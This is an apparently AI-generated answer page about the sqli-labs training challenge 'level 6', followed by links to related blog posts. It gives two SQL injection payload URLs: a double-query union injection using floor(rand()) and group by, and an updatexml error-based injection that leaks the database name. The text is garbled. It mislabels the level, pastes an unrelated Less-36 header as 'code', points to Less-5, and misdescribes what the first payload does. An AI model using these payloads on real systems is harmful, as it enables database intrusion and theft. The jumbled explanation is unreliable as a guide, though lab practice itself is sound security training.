sqlilabs第六关
时间: 2023-12-26 15:00:10 浏览: 82
sqlilabs过关手册注入天书.pdf
sqlilabs第六关是一个MySQL注入的挑战,代码如下:
```php
Less-36 Bypass MySQL Real Escape String
//logging the conn
```
在这个挑战中,我们需要利用双查询注入来绕过MySQL的真实转义字符串保护机制。通过分析和实验,我们可以发现与之前的注入方法不同,需要补充并理解一下双查询注入的知识。一个详细讲解双查询注入的网站可以提供相关的知识,让我们更好地理解这个注入方法。
在注入过程中,我们首先需要判断字段数。我们可以通过访问以下URL来判断字段数:
```
http://localhost:8080/sqli-labs_2/sqlilabs/Less-5/?id=1' union select count(*),count(*),concat((select database() limit 1,1),floor(rand()*2)) as a from information_schema.tables group by a#
```
接下来,我们可以使用下面的URL来爆破数据库名:
```
?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--
```
通过以上的步骤,我们可以继续进行注入挑战。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
- *1* [422926799#note#sqli-labs第三十六关1](https://download.csdn.net/download/weixin_35780426/86257981)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"]
- *2* [sqli-labs第五、六关(详细)](https://blog.csdn.net/qq_37370714/article/details/120205799)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"]
- *3* [sqli-labs系列——第六关](https://blog.csdn.net/qq_51923959/article/details/112682034)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"]
[ .reference_list ]
阅读全文